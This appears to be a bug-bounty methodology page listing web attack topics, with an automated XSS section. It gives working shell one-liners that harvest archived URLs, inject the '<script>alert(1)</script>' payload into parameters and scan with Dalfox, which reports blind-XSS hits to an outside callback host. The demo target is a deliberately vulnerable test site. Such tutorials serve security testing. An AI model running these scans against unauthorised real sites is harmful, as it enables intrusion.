Account Takeover Methodology
Application Level DoS
Authentication Bypass
Broken-Link Hijacking
Broken Auth And Session Management
Finding CVEs
Web Page Source Code Review
EXIF Geo Data Not Stripped
File Upload Bypass
Find Origin IP
GraphQL
HTTP Desync Attack
Host-Header Attack
HTML-Injection
IDOR
JWT ATTACK
OAuth
SSTI
Sign Up Functionality
Tabnabbing
Weak Password Policy
Automated XSS
Make sure you have Go installed on your Machine

To Install Go on your Machine:

1) sudo apt install -y golang
2) export GOROOT=/usr/lib/go
3) export GOPATH=$HOME/go
4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
5) source .bashrc

How to Hunt Blind XSS using Dalfox?

  • Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
  • Use GF patterns to find Possible XSS Vulnerable Parameters.
  • Use Dalfox to find XSS.
  • Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

How to Hunt Reflected XSS?

  • Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
  • Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
  • Steps :
waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Tools Download Links:-

Find Script here : QuickXSS​
If you have any Questions, Reach out to me via Twitter​

Twitter : Fani Malik​

Twitter : Faizee Asad​